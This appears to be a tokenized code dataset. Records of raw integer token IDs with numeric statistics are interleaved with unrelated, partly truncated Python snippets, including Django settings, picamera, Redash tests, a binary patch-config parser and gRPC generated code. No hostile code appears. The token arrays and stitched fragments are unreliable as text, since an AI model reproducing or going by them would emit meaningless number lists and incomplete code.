220,
705,
28241,
14208,
13,
3642,
822,
13,
18439,
13,
27171,
1574,
13,
47649,
3299,
34621,
1574,
3256,
198,
220,
220,
220,
705,
28241,
14208,
13,
3642,
822,
13,
37348,
1095,
13,
27171,
1574,
13,
12837,
34621,
1574,
3256,
198,
220,
220,
220,
705,
28241,
14208,
13,
27171,
1574,
13,
12976,
73,
5430,
13,
55,
19778,
29046,
34621,
1574,
3256,
198,
60,
198,
198,
13252,
2394,
62,
4261,
5639,
1340,
37,
796,
705,
37301,
62,
744,
278,
13,
6371,
82,
6,
198,
198,
51,
3620,
6489,
29462,
796,
685,
198,
220,
220,
220,
1391,
198,
220,
220,
220,
220,
220,
220,
220,
705,
31098,
10619,
10354,
705,
28241,
14208,
13,
28243,
13,
1891,
2412,
13,
28241,
14208,
13,
35,
73,
14208,
12966,
17041,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
705,
34720,
50,
10354,
685,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
705,
24805,
62,
34720,
50,
10354,
6407,
11,
198,
220,
220,
220,
220,
220,
220,
220,
705,
3185,
51,
11053,
10354,
1391,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
22866,
62,
14681,
669,
10354,
685,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
28241,
14208,
13,
28243,
13,
22866,
62,
14681,
669,
13,
24442,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
28241,
14208,
13,
28243,
13,
22866,
62,
14681,
669,
13,
25927,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
28241,
14208,
13,
3642,
822,
13,
18439,
13,
22866,
62,
14681,
669,
13,
18439,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
28241,
14208,
13,
3642,
822,
13,
37348,
1095,
13,
22866,
62,
14681,
669,
13,
37348,
1095,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
16589,
198,
220,
220,
220,
220,
220,
220,
220,
8964,
198,
220,
220,
220,
8964,
198,
60,
198,
198,
19416,
18878,
62,
2969,
31484,
6234,
796,
705,
37301,
62,
744,
278,
13,
18504,
12397,
13,
31438,
6,
628,
198,
35,
1404,
6242,
1921,
1546,
796,
1391,
198,
220,
220,
220,
705,
12286,
10354,
1391,
198,
220,
220,
220,
220,
220,
220,
220,
705,
26808,
8881,
10354,
705,
28241,
14208,
13,
9945,
13,
1891,
2412,
13,
25410,
578,
18,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
705,
20608,
10354,
49688,
62,
34720,
1220,
705,
9945,
13,
25410,
578,
18,
3256,
198,
220,
220,
220,
1782,
198,
92,
628,
198,
32,
24318,
62,
47924,
54,
12532,
62,
23428,
2389,
1404,
20673,
796,
685,
198,
220,
220,
220,
1391,
198,
220,
220,
220,
220,
220,
220,
220,
705,
20608,
10354,
705,
28241,
14208,
13,
3642,
822,
13,
18439,
13,
28712,
62,
12102,
341,
13,
12982,
33682,
18925,
414,
47139,
1352,
3256,
198,
220,
220,
220,
8964,
198,
220,
220,
220,
1391,
198,
220,
220,
220,
220,
220,
220,
220,
705,
20608,
10354,
705,
28241,
14208,
13,
3642,
822,
13,
18439,
13,
28712,
62,
12102,
341,
13,
44046,
24539,
47139,
1352,
3256,
198,
220,
220,
220,
8964,
198,
220,
220,
220,
1391,
198,
220,
220,
220,
220,
220,
220,
220,
705,
20608,
10354,
705,
28241,
14208,
13,
3642,
822,
13,
18439,
13,
28712,
62,
12102,
341,
13,
17227,
35215,
47139,
1352,
3256,
198,
220,
220,
220,
8964,
198,
220,
220,
220,
1391,
198,
220,
220,
220,
220,
220,
220,
220,
705,
20608,
10354,
705,
28241,
14208,
13,
3642,
822,
13,
18439,
13,
28712,
62,
12102,
341,
13,
45,
39223,
35215,
47139,
1352,
3256,
198,
220,
220,
220,
8964,
198,
60,
628,
198,
43,
15567,
52,
11879,
62,
34,
16820,
796,
705,
268,
12,
385,
6,
198,
198,
34694,
62,
57,
11651,
796,
705,
17429,
6,
198,
198,
19108,
62,
40,
1507,
45,
796,
6407,
198,
198,
19108,
62,
43,
940,
45,
796,
6407,
198,
198,
19108,
62,
51,
57,
796,
6407,
628,
198,
35744,
2149,
62,
21886,
796,
31051,
12708,
14,
6,
628,
198,
7206,
38865,
62,
39371,
46,
62,
44603,
796,
705,
28241,
14208,
13,
9945,
13,
27530,
13,
12804,
27722,
15878,
6,
628,
198,
49,
6465,
62,
10913,
2390,
6217,
14670,
796,
1391,
198,
220,
220,
220,
705,
7206,
38865,
62,
49,
10619,
1137,
1137,
62,
31631,
1546,
10354,
357,
198,
220,
220,
220,
220,
220,
220,
220,
705,
2118,
62,
30604,
13,
10920,
19288,
13,
40386,
49,
437,
11882,
3256,
198,
220,
220,
220,
1267,
198,
92,
198
] | 2.213393 | 1,120 |
# vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python camera library for the Rasperry-Pi camera module
# Copyright (c) 2013-2015 Dave Jones <[email protected]>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's
str = type('')
import mimetypes
import ctypes as ct
from functools import reduce
from operator import or_
from . import bcm_host, mmalobj as mo, mmal
from .encoders import PiCookedOneImageEncoder, PiRawOneImageEncoder
from .exc import PiCameraRuntimeError, PiCameraValueError
| [
2,
43907,
25,
900,
2123,
1509,
28,
19,
39747,
28,
19,
2393,
12685,
7656,
28,
40477,
12,
23,
25,
198,
2,
198,
2,
11361,
4676,
5888,
329,
262,
28513,
525,
563,
12,
38729,
4676,
8265,
198,
2,
15069,
357,
66,
8,
2211,
12,
4626,
9935,
5437,
1279,
67,
1015,
31,
19204,
687,
13,
2398,
13,
2724,
29,
198,
2,
198,
2,
2297,
396,
3890,
290,
779,
287,
2723,
290,
13934,
5107,
11,
351,
393,
1231,
198,
2,
17613,
11,
389,
10431,
2810,
326,
262,
1708,
3403,
389,
1138,
25,
198,
2,
198,
2,
220,
220,
220,
220,
1635,
2297,
396,
2455,
507,
286,
2723,
2438,
1276,
12377,
262,
2029,
6634,
198,
2,
220,
220,
220,
220,
220,
220,
4003,
11,
428,
1351,
286,
3403,
290,
262,
1708,
37592,
13,
198,
2,
220,
220,
220,
220,
1635,
2297,
396,
2455,
507,
287,
13934,
1296,
1276,
22919,
262,
2029,
6634,
198,
2,
220,
220,
220,
220,
220,
220,
4003,
11,
428,
1351,
286,
3403,
290,
262,
1708,
37592,
287,
262,
198,
2,
220,
220,
220,
220,
220,
220,
10314,
290,
14,
273,
584,
5696,
2810,
351,
262,
6082,
13,
198,
2,
220,
220,
220,
220,
1635,
16126,
262,
1438,
286,
262,
6634,
15762,
4249,
262,
198,
2,
220,
220,
220,
220,
220,
220,
3891,
286,
663,
20420,
743,
307,
973,
284,
11438,
393,
7719,
3186,
198,
2,
220,
220,
220,
220,
220,
220,
10944,
422,
428,
3788,
1231,
2176,
3161,
3194,
7170,
13,
198,
2,
198,
2,
12680,
47466,
3180,
36592,
2389,
1961,
11050,
3336,
27975,
38162,
9947,
367,
15173,
4877,
5357,
27342,
9865,
3843,
20673,
366,
1921,
3180,
1,
198,
2,
5357,
15529,
7788,
32761,
6375,
8959,
49094,
34764,
11015,
11,
47783,
2751,
11,
21728,
5626,
40880,
5390,
11,
3336,
198,
2,
8959,
49094,
34764,
11015,
3963,
34482,
3398,
1565,
5603,
25382,
5357,
376,
46144,
7473,
317,
16652,
2149,
37232,
33079,
48933,
198,
2,
15986,
13954,
48778,
1961,
13,
3268,
8005,
49261,
50163,
3336,
27975,
38162,
9947,
49707,
14418,
6375,
27342,
9865,
3843,
20673,
9348,
198,
2,
43031,
19146,
7473,
15529,
42242,
11,
3268,
17931,
23988,
11,
19387,
25256,
1847,
11,
38846,
11,
7788,
3620,
6489,
13153,
11,
6375,
198,
2,
7102,
5188,
10917,
3525,
12576,
29506,
25552,
357,
1268,
39149,
2751,
11,
21728,
5626,
40880,
5390,
11,
41755,
11335,
10979,
3963,
198,
2,
28932,
2257,
2043,
37780,
21090,
50,
6375,
49254,
26,
406,
18420,
3963,
23210,
11,
42865,
11,
6375,
4810,
19238,
29722,
26,
6375,
43949,
44180,
198,
2,
23255,
49,
8577,
24131,
8,
29630,
36,
5959,
7257,
2937,
1961,
5357,
6177,
15529,
3336,
15513,
3963,
43031,
25382,
11,
7655,
2767,
16879,
3268,
198,
2,
27342,
10659,
11,
19269,
18379,
43031,
25382,
11,
6375,
309,
9863,
357,
1268,
39149,
2751,
399,
7156,
43,
3528,
18310,
6375,
25401,
54,
24352,
8,
198,
2,
5923,
1797,
2751,
3268,
15529,
34882,
16289,
3963,
3336,
23210,
3963,
12680,
47466,
11,
45886,
16876,
5984,
29817,
1961,
3963,
3336,
198,
2,
28069,
11584,
25382,
3963,
13558,
3398,
29506,
11879,
13,
198,
198,
6738,
11593,
37443,
834,
1330,
357,
198,
220,
220,
220,
28000,
1098,
62,
17201,
874,
11,
198,
220,
220,
220,
3601,
62,
8818,
11,
198,
220,
220,
220,
7297,
11,
198,
220,
220,
220,
4112,
62,
11748,
11,
198,
220,
220,
220,
1267,
198,
198,
2,
6889,
9485,
17,
338,
965,
7548,
284,
9485,
18,
338,
198,
2536,
796,
2099,
7,
7061,
8,
198,
198,
11748,
17007,
2963,
12272,
198,
11748,
269,
19199,
355,
269,
83,
198,
6738,
1257,
310,
10141,
1330,
4646,
198,
6738,
10088,
1330,
393,
62,
198,
198,
6738,
764,
1330,
275,
11215,
62,
4774,
11,
285,
7617,
26801,
355,
6941,
11,
285,
7617,
198,
6738,
764,
12685,
375,
364,
1330,
13993,
28937,
276,
3198,
5159,
27195,
12342,
11,
13993,
27369,
3198,
5159,
27195,
12342,
198,
6738,
764,
41194,
1330,
13993,
35632,
41006,
12331,
11,
13993,
35632,
11395,
12331,
628,
198
] | 3.285938 | 640 |
import os
from typing import Any, Dict
import pytest
from src.stairlight.config import Configurator
from src.stairlight.key import StairlightConfigKey
from src.stairlight.source.redash import (
RedashTemplate,
RedashTemplateSource,
TemplateSourceType,
)
@pytest.mark.parametrize(
"env_key, path",
[
("REDASH_DATABASE_URL", "src/stairlight/source/sql/redash_queries.sql"),
],
)
@pytest.mark.parametrize(
(
"query_id, query_name, query_str, "
"data_source_name, params, mapped_table_attributes"
),
[
(
5,
"Copy of (#4) New Query",
"SELECT * FROM {{ table }}",
"metadata",
{"table": "dashboards"},
{
"Labels": {"Category": "Redash test"},
"Parameters": {"table": "dashboards"},
"TableName": "Copy of (#4) New Query",
},
),
],
)
| [
11748,
28686,
198,
6738,
19720,
1330,
4377,
11,
360,
713,
198,
198,
11748,
12972,
9288,
198,
198,
6738,
12351,
13,
301,
958,
2971,
13,
11250,
1330,
17056,
333,
1352,
198,
6738,
12351,
13,
301,
958,
2971,
13,
2539,
1330,
520,
958,
2971,
16934,
9218,
198,
6738,
12351,
13,
301,
958,
2971,
13,
10459,
13,
445,
1077,
1330,
357,
198,
220,
220,
220,
2297,
1077,
30800,
11,
198,
220,
220,
220,
2297,
1077,
30800,
7416,
11,
198,
220,
220,
220,
37350,
7416,
6030,
11,
198,
8,
628,
198,
31,
9078,
9288,
13,
4102,
13,
17143,
316,
380,
2736,
7,
198,
220,
220,
220,
366,
24330,
62,
2539,
11,
3108,
1600,
198,
220,
220,
220,
685,
198,
220,
220,
220,
220,
220,
220,
220,
5855,
22083,
11211,
62,
35,
1404,
6242,
11159,
62,
21886,
1600,
366,
10677,
14,
301,
958,
2971,
14,
10459,
14,
25410,
14,
445,
1077,
62,
421,
10640,
13,
25410,
12340,
198,
220,
220,
220,
16589,
198,
8,
628,
198,
31,
9078,
9288,
13,
4102,
13,
17143,
316,
380,
2736,
7,
198,
220,
220,
220,
357,
198,
220,
220,
220,
220,
220,
220,
220,
366,
22766,
62,
312,
11,
12405,
62,
3672,
11,
12405,
62,
2536,
11,
366,
198,
220,
220,
220,
220,
220,
220,
220,
366,
7890,
62,
10459,
62,
3672,
11,
42287,
11,
27661,
62,
11487,
62,
1078,
7657,
1,
198,
220,
220,
220,
10612,
198,
220,
220,
220,
685,
198,
220,
220,
220,
220,
220,
220,
220,
357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
642,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
29881,
286,
17426,
19,
8,
968,
43301,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
46506,
1635,
16034,
22935,
3084,
34949,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
38993,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
19779,
11487,
1298,
366,
42460,
12821,
25719,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1391,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
17822,
1424,
1298,
19779,
27313,
1298,
366,
7738,
1077,
1332,
25719,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
48944,
1298,
19779,
11487,
1298,
366,
42460,
12821,
25719,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
10962,
5376,
1298,
366,
29881,
286,
17426,
19,
8,
968,
43301,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
8964,
198,
220,
220,
220,
220,
220,
220,
220,
10612,
198,
220,
220,
220,
16589,
198,
8,
198
] | 2.063457 | 457 |
import os
import pickle
import numpy as np
import pandas as pd
from torch.utils.data import Dataset
DATASET_DIR = "datasets"
| [
11748,
28686,
198,
11748,
2298,
293,
198,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
19798,
292,
355,
279,
67,
198,
198,
6738,
28034,
13,
26791,
13,
7890,
1330,
16092,
292,
316,
628,
198,
35,
1404,
1921,
2767,
62,
34720,
796,
366,
19608,
292,
1039,
1,
628,
628
] | 2.75 | 48 |
# Exercise 013 - That Classic Average
"""Create a program that reads two grades from a student and calculates their average, showing a message at the end, according to the average achieved:
- Average below 5.0: FAIL"""
grade_01 = float(input("Enter the first grade: "))
grade_02 = float(input("Enter the second grade: "))
average = (grade_01 + grade_02) / 2
if 5 <= average <= 10:
print(f"The student took {average} of note, was approved! ")
elif 0 <= average < 5:
print(f"The student took {average} of note, was disapproved! ")
else:
print("Wrong value")
| [
2,
32900,
5534,
18,
532,
1320,
13449,
13475,
198,
198,
37811,
16447,
257,
1430,
326,
9743,
734,
19051,
422,
257,
3710,
290,
43707,
511,
2811,
11,
4478,
257,
3275,
379,
262,
886,
11,
1864,
284,
262,
2811,
8793,
25,
198,
12,
13475,
2174,
642,
13,
15,
25,
9677,
4146,
37811,
198,
198,
9526,
62,
486,
796,
12178,
7,
15414,
7203,
17469,
262,
717,
9559,
25,
366,
4008,
198,
9526,
62,
2999,
796,
12178,
7,
15414,
7203,
17469,
262,
1218,
9559,
25,
366,
4008,
198,
23913,
796,
357,
9526,
62,
486,
1343,
9559,
62,
2999,
8,
1220,
362,
198,
198,
361,
642,
19841,
2811,
19841,
838,
25,
198,
220,
220,
220,
3601,
7,
69,
1,
464,
3710,
1718,
1391,
23913,
92,
286,
3465,
11,
373,
6325,
0,
366,
8,
198,
198,
417,
361,
657,
19841,
2811,
1279,
642,
25,
198,
220,
220,
220,
3601,
7,
69,
1,
464,
3710,
1718,
1391,
23913,
92,
286,
3465,
11,
373,
22293,
1079,
0,
366,
8,
198,
198,
17772,
25,
198,
220,
220,
220,
3601,
7203,
39213,
506,
1988,
4943,
198
] | 3.255682 | 176 |
import datetime
import logging
import json
import hashlib
import hmac
import base64
import aiohttp
import asyncio
from collections import deque
| [
11748,
4818,
8079,
198,
11748,
18931,
198,
11748,
33918,
198,
11748,
12234,
8019,
198,
11748,
289,
20285,
198,
11748,
2779,
2414,
198,
11748,
257,
952,
4023,
198,
11748,
30351,
952,
198,
6738,
17268,
1330,
390,
4188,
628,
198
] | 3.842105 | 38 |
import configparser
BACKUP_SUFFIX = ".bak"
_parser = configparser.ConfigParser()
def parse_file(filename):
"""Return all infomation you needed to patch files"""
_parser.read(filename)
result = {'files': {}}
result['metadata'] = {
"name": _parser['metadata']['name'],
"description": _parser['metadata']['description'],
"congratulation": _parser['metadata']['congratulation'],
} if 'metadata' in _parser else {}
for patch_name in _parser.sections():
if not patch_name.startswith('patch:'):
continue
s = _parser[patch_name]
patch_name = patch_name[6:]
this = {
"unsign": s.getboolean('unsign', False),
"file": s['file'],
"relatives": [],
"absolutes": [],
}
if 'relatives' in s:
for line in s['relatives'].strip('\n, ').split('\n'):
line = line.split(',')
this['relatives'].append({
"src": bytes.fromhex(line[0]),
"dst": bytes.fromhex(line[1]),
"fg": dict(zip(
(_str2range(i) for i in line[2::2]),
(bytes.fromhex(i) for i in line[3::2]))),
})
if 'absolutes' in s:
for line in s['absolutes'].strip('\n, ').split('\n'):
this['absolutes'].append({
"pos": int(line[0]),
"src": bytes.fromhex(line[1]),
"dst": bytes.fromhex(line[2]),
})
result['files'][patch_name] = this
return result
| [
11748,
4566,
48610,
198,
198,
31098,
8577,
62,
12564,
5777,
10426,
796,
27071,
65,
461,
1,
198,
198,
62,
48610,
796,
4566,
48610,
13,
16934,
46677,
3419,
628,
198,
4299,
21136,
62,
7753,
7,
34345,
2599,
198,
220,
220,
220,
37227,
13615,
477,
1167,
296,
341,
345,
2622,
284,
8529,
3696,
37811,
198,
220,
220,
220,
4808,
48610,
13,
961,
7,
34345,
8,
198,
220,
220,
220,
1255,
796,
1391,
6,
16624,
10354,
1391,
11709,
198,
220,
220,
220,
1255,
17816,
38993,
20520,
796,
1391,
198,
220,
220,
220,
220,
220,
220,
220,
366,
3672,
1298,
4808,
48610,
17816,
38993,
6,
7131,
6,
3672,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
366,
11213,
1298,
4808,
48610,
17816,
38993,
6,
7131,
6,
11213,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
366,
36801,
10366,
1741,
1298,
4808,
48610,
17816,
38993,
6,
7131,
6,
36801,
10366,
1741,
6,
4357,
198,
220,
220,
220,
1782,
611,
705,
38993,
6,
287,
4808,
48610,
2073,
23884,
628,
220,
220,
220,
329,
8529,
62,
3672,
287,
4808,
48610,
13,
23946,
33529,
198,
220,
220,
220,
220,
220,
220,
220,
611,
407,
8529,
62,
3672,
13,
9688,
2032,
342,
10786,
17147,
32105,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2555,
198,
220,
220,
220,
220,
220,
220,
220,
264,
796,
4808,
48610,
58,
17147,
62,
3672,
60,
198,
220,
220,
220,
220,
220,
220,
220,
8529,
62,
3672,
796,
8529,
62,
3672,
58,
21,
47715,
198,
220,
220,
220,
220,
220,
220,
220,
428,
796,
1391,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
403,
12683,
1298,
264,
13,
1136,
2127,
21052,
10786,
403,
12683,
3256,
10352,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7753,
1298,
264,
17816,
7753,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
2411,
2929,
1298,
685,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
8937,
349,
1769,
1298,
685,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
1782,
628,
220,
220,
220,
220,
220,
220,
220,
611,
705,
2411,
2929,
6,
287,
264,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
1627,
287,
264,
17816,
2411,
2929,
6,
4083,
36311,
10786,
59,
77,
11,
705,
737,
35312,
10786,
59,
77,
6,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1627,
796,
1627,
13,
35312,
7,
3256,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
428,
17816,
2411,
2929,
6,
4083,
33295,
15090,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
10677,
1298,
9881,
13,
6738,
33095,
7,
1370,
58,
15,
46570,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
67,
301,
1298,
9881,
13,
6738,
33095,
7,
1370,
58,
16,
46570,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
40616,
1298,
8633,
7,
13344,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
44104,
2536,
17,
9521,
7,
72,
8,
329,
1312,
287,
1627,
58,
17,
3712,
17,
46570,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
357,
33661,
13,
6738,
33095,
7,
72,
8,
329,
1312,
287,
1627,
58,
18,
3712,
17,
60,
4008,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
32092,
198,
220,
220,
220,
220,
220,
220,
220,
611,
705,
8937,
349,
1769,
6,
287,
264,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
1627,
287,
264,
17816,
8937,
349,
1769,
6,
4083,
36311,
10786,
59,
77,
11,
705,
737,
35312,
10786,
59,
77,
6,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
428,
17816,
8937,
349,
1769,
6,
4083,
33295,
15090,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
1930,
1298,
493,
7,
1370,
58,
15,
46570,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
10677,
1298,
9881,
13,
6738,
33095,
7,
1370,
58,
16,
46570,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
67,
301,
1298,
9881,
13,
6738,
33095,
7,
1370,
58,
17,
46570,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
32092,
628,
220,
220,
220,
220,
220,
220,
220,
1255,
17816,
16624,
6,
7131,
17147,
62,
3672,
60,
796,
428,
628,
220,
220,
220,
1441,
1255,
628
] | 1.905484 | 857 |
#!/usr/bin/env python
# for i from 2 to 20
# compute prime factorization of i.
# use largest multiplicity in any
# prime factor seen thus far
facs = {}
for i in xrange(2,21):
f = factorize(i)
for j in f:
facs[j] = max(facs.get(j,0),f[j])
print reduce(lambda x,y: x*y, (i**facs[i] for i in facs))
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
2,
329,
1312,
422,
362,
284,
1160,
198,
2,
24061,
6994,
5766,
1634,
286,
1312,
13,
198,
2,
779,
4387,
15082,
8467,
287,
597,
198,
2,
6994,
5766,
1775,
4145,
1290,
198,
198,
69,
16436,
796,
23884,
198,
1640,
1312,
287,
2124,
9521,
7,
17,
11,
2481,
2599,
198,
220,
220,
220,
277,
796,
5766,
1096,
7,
72,
8,
198,
220,
220,
220,
329,
474,
287,
277,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1777,
82,
58,
73,
60,
796,
3509,
7,
69,
16436,
13,
1136,
7,
73,
11,
15,
828,
69,
58,
73,
12962,
198,
4798,
4646,
7,
50033,
2124,
11,
88,
25,
2124,
9,
88,
11,
357,
72,
1174,
69,
16436,
58,
72,
60,
329,
1312,
287,
1777,
82,
4008,
198
] | 2.325926 | 135 |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: onos/config/diags/diags.proto
# plugin: python-betterproto
from dataclasses import dataclass
from typing import AsyncIterator, Dict
import betterproto
from betterproto.grpc.grpclib_server import ServiceBase
import grpclib
class Type(betterproto.Enum):
"""Change (Network or Device) event type"""
# NONE indicates this response does not represent a modification of the
# Change
NONE = 0
# ADDED is an event which occurs when a Change is added to the topology
ADDED = 1
# UPDATED is an event which occurs when a Change is updated
UPDATED = 2
# REMOVED is an event which occurs when a Change is removed from the
# configuration
REMOVED = 3
@dataclass(eq=False, repr=False)
class OpStateRequest(betterproto.Message):
"""
OpStateRequest is a message for specifying GetOpState query parameters.
"""
# The request is always in the context of a Device ID. If the device does not
# exist or is disconnected an error will be returned.
device_id: str = betterproto.string_field(1)
# subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
# REMOVE) that occur after all paths for the device have been streamed to the
# client
subscribe: bool = betterproto.bool_field(2)
@dataclass(eq=False, repr=False)
@dataclass(eq=False, repr=False)
class ListNetworkChangeRequest(betterproto.Message):
"""
ListNetworkChangeRequest requests a stream of changes and updates to them
By default, the request requests a stream of all changes that are present
in the topology when the request is received by the service. However, if
`subscribe` is `true`, the stream will remain open after all changes have
been sent and events that occur following the last changes will be streamed
to the client until the stream is closed. If "withoutReplay" is true then
only changes that happen after the call will be returned
"""
# subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
# REMOVE) that occur after all devices have been streamed to the client
subscribe: bool = betterproto.bool_field(1)
# option to specify a specific network change - if blank or '*' then select
# all Can support `*` (match many chars) or '?' (match one char) as wildcard
changeid: str = betterproto.string_field(2)
# option to request only changes that happen after the call
without_replay: bool = betterproto.bool_field(3)
@dataclass(eq=False, repr=False)
class ListNetworkChangeResponse(betterproto.Message):
"""ListNetworkChangeResponse carries a single network change event"""
# change is the network change on which the event occurred
change: "_change_network__.NetworkChange" = betterproto.message_field(1)
# type is a qualification of the type of change being made
type: "Type" = betterproto.enum_field(2)
@dataclass(eq=False, repr=False)
class ListDeviceChangeRequest(betterproto.Message):
"""
ListDeviceChangeRequest requests a stream of changes and updates to them By
default, the request requests a stream of all changes that are present in
the topology when the request is received by the service. However, if
`subscribe` is `true`, the stream will remain open after all changes have
been sent and events that occur following the last changes will be streamed
to the client until the stream is closed. If "withoutReplay" is true then
only changes that happen after the call will be returned
"""
# subscribe indicates whether to subscribe to events (e.g. ADD, UPDATE, and
# REMOVE) that occur after all devices have been streamed to the client
subscribe: bool = betterproto.bool_field(1)
# option to specify a specific device change - if blank or '*' then select
# all Can support `*` (match many chars) or '?' (match one char) as wildcard
device_id: str = betterproto.string_field(2)
# device_version is an optional device version
device_version: str = betterproto.string_field(3)
# option to request only changes that happen after the call
without_replay: bool = betterproto.bool_field(4)
@dataclass(eq=False, repr=False)
class ListDeviceChangeResponse(betterproto.Message):
"""ListDeviceChangeResponse carries a single network change event"""
# change is the device change on which the event occurred
change: "_change_device__.DeviceChange" = betterproto.message_field(1)
# type is a qualification of the type of change being made
type: "Type" = betterproto.enum_field(2)
from .. import admin as _admin__
from ..change import device as _change_device__
from ..change import network as _change_network__
| [
2,
2980,
515,
416,
262,
8435,
11876,
17050,
13,
220,
8410,
5626,
48483,
0,
198,
2,
4237,
25,
319,
418,
14,
11250,
14,
10989,
3775,
14,
10989,
3775,
13,
1676,
1462,
198,
2,
13877,
25,
21015,
12,
27903,
1676,
1462,
198,
6738,
4818,
330,
28958,
1330,
4818,
330,
31172,
198,
6738,
19720,
1330,
1081,
13361,
37787,
11,
360,
713,
198,
198,
11748,
1365,
1676,
1462,
198,
6738,
1365,
1676,
1462,
13,
2164,
14751,
13,
2164,
79,
565,
571,
62,
15388,
1330,
4809,
14881,
198,
11748,
1036,
79,
565,
571,
628,
198,
4871,
5994,
7,
27903,
1676,
1462,
13,
4834,
388,
2599,
198,
220,
220,
220,
37227,
19400,
357,
26245,
393,
16232,
8,
1785,
2099,
37811,
628,
220,
220,
220,
1303,
399,
11651,
9217,
428,
2882,
857,
407,
2380,
257,
17613,
286,
262,
198,
220,
220,
220,
1303,
9794,
198,
220,
220,
220,
399,
11651,
796,
657,
